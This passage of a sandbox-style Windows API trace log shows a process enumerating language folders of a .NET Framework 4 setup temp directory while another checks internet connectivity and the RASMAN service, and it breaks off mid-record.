| 07:44:47,433 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:47,433 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:47,433 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:47,433 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:47,433 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:47,433 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1038\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,433 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xa6\x88\x12\xe3\x91\xcf\x01`\xf9Rg\xe3\x91\xcf\x01P\xb5\x8b\x12\xe3\x91\xcf\x01P\xb5\x8b\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00 .\x8a\x12\xe3\x91\xcf\x01 .\x8a\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01 .\x8a\x12\xe3\x91\xcf\x01\x9e\x10\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00 .\x8a\x12\xe3\x91\xcf\x01 .\x8a\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01 .\x8a\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,433 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,433 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,513 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1040\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,513 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xb5\x8b\x12\xe3\x91\xcf\x01\x90\x80Tg\xe3\x91\xcf\x01\xe0J\x90\x12\xe3\x91\xcf\x01\xe0J\x90\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x80<\x8d\x12\xe3\x91\xcf\x01\x80<\x8d\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x80<\x8d\x12\xe3\x91\xcf\x01;\x0e\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x80<\x8d\x12\xe3\x91\xcf\x01\x80<\x8d\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x80<\x8d\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,513 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,513 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,593 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1041\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,593 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0J\x90\x12\xe3\x91\xcf\x01\xc0\x07Vg\xe3\x91\xcf\x01@Y\x93\x12\xe3\x91\xcf\x01@Y\x93\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x10\xd2\x91\x12\xe3\x91\xcf\x01\x10\xd2\x91\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x10\xd2\x91\x12\xe3\x91\xcf\x01\x8d'\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x10\xd2\x91\x12\xe3\x91\xcf\x01\x10\xd2\x91\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x10\xd2\x91\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,593 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,593 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,673 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1042\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,673 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xe0\x94\x12\xe3\x91\xcf\x01\xf0\x8eWg\xe3\x91\xcf\x01\xa0g\x96\x12\xe3\x91\xcf\x01\xa0g\x96\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00p\xe0\x94\x12\xe3\x91\xcf\x01p\xe0\x94\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01p\xe0\x94\x12\xe3\x91\xcf\x01\x8f1\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xa0g\x96\x12\xe3\x91\xcf\x01\xa0g\x96\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xa0g\x96\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,673 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,673 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,843 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1043\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,843 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0g\x96\x12\xe3\x91\xcf\x01\xf0\x8eWg\xe3\x91\xcf\x01\x00v\x99\x12\xe3\x91\xcf\x01\x00v\x99\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xd0\xee\x97\x12\xe3\x91\xcf\x01\xd0\xee\x97\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xd0\xee\x97\x12\xe3\x91\xcf\x01\xda \x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x00v\x99\x12\xe3\x91\xcf\x01\x00v\x99\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x00v\x99\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,843 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,843 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:47,923 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1044\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:47,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xfd\x9a\x12\xe3\x91\xcf\x01 \x16Yg\xe3\x91\xcf\x01\x90\x0b\x9e\x12\xe3\x91\xcf\x01\x90\x0b\x9e\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x000\xfd\x9a\x12\xe3\x91\xcf\x010\xfd\x9a\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x010\xfd\x9a\x12\xe3\x91\xcf\x01\xe6\x0b\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00`\x84\x9c\x12\xe3\x91\xcf\x01`\x84\x9c\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01`\x84\x9c\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:47,923 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:47,923 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,003 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1045\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,003 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\x0b\x9e\x12\xe3\x91\xcf\x01P\x9dZg\xe3\x91\xcf\x01\xf0\x19\xa1\x12\xe3\x91\xcf\x01\xf0\x19\xa1\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xc0\x92\x9f\x12\xe3\x91\xcf\x01\xc0\x92\x9f\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xc0\x92\x9f\x12\xe3\x91\xcf\x01\xc8\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xc0\x92\x9f\x12\xe3\x91\xcf\x01\xc0\x92\x9f\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xc0\x92\x9f\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,003 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,003 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,084 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1046\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,084 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x19\xa1\x12\xe3\x91\xcf\x01P\x9dZg\xe3\x91\xcf\x01P(\xa4\x12\xe3\x91\xcf\x01P(\xa4\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00 \xa1\xa2\x12\xe3\x91\xcf\x01 \xa1\xa2\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01 \xa1\xa2\x12\xe3\x91\xcf\x01c\x0e\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00 \xa1\xa2\x12\xe3\x91\xcf\x01 \xa1\xa2\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01 \xa1\xa2\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,084 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,084 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,164 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1049\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,164 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P(\xa4\x12\xe3\x91\xcf\x01\x80$\g\xe3\x91\xcf\x01\xb06\xa7\x12\xe3\x91\xcf\x01\xb06\xa7\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x80\xaf\xa5\x12\xe3\x91\xcf\x01\x80\xaf\xa5\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x80\xaf\xa5\x12\xe3\x91\xcf\x01\xb8\xd4\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x80\xaf\xa5\x12\xe3\x91\xcf\x01\x80\xaf\xa5\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x80\xaf\xa5\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,164 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,164 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,234 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:48,234 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:48,234 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00182d48 | |
| 07:44:48,234 | 1308 | OpenServiceW |
ServiceControlManager => 0x00182d48 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00173120 | |
| 07:44:48,234 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:48,234 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:48,244 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:48,244 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1053\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,244 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb06\xa7\x12\xe3\x91\xcf\x01\xb0\xab]g\xe3\x91\xcf\x01\x10E\xaa\x12\xe3\x91\xcf\x01\x10E\xaa\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xe0\xbd\xa8\x12\xe3\x91\xcf\x01\xe0\xbd\xa8\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xe0\xbd\xa8\x12\xe3\x91\xcf\x01\x19\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xe0\xbd\xa8\x12\xe3\x91\xcf\x01\xe0\xbd\xa8\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xe0\xbd\xa8\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,244 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,244 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,324 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\1055\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,324 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10E\xaa\x12\xe3\x91\xcf\x01\xb0\xab]g\xe3\x91\xcf\x01pS\xad\x12\xe3\x91\xcf\x01pS\xad\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00@\xcc\xab\x12\xe3\x91\xcf\x01@\xcc\xab\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01@\xcc\xab\x12\xe3\x91\xcf\x01\x13\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00@\xcc\xab\x12\xe3\x91\xcf\x01@\xcc\xab\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01@\xcc\xab\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,324 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,324 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,414 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\2052\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,414 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00pS\xad\x12\xe3\x91\xcf\x01\xb08Eg\xe3\x91\xcf\x01\xd0a\xb0\x12\xe3\x91\xcf\x01\xd0a\xb0\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xa0\xda\xae\x12\xe3\x91\xcf\x01\xa0\xda\xae\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xa0\xda\xae\x12\xe3\x91\xcf\x01\xc3\x16\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xd0a\xb0\x12\xe3\x91\xcf\x01\xd0a\xb0\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xd0a\xb0\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,414 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,414 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,494 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\2070\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,494 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\xe9\xb1\x12\xe3\x91\xcf\x01\x80$\g\xe3\x91\xcf\x010p\xb3\x12\xe3\x91\xcf\x010p\xb3\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\x00\xe9\xb1\x12\xe3\x91\xcf\x01\x00\xe9\xb1\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\x00\xe9\xb1\x12\xe3\x91\xcf\x01\xaf\x0f\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x000p\xb3\x12\xe3\x91\xcf\x010p\xb3\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x010p\xb3\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,494 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,494 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,574 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\3076\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,574 | 504 | NtQueryDirectoryFile |
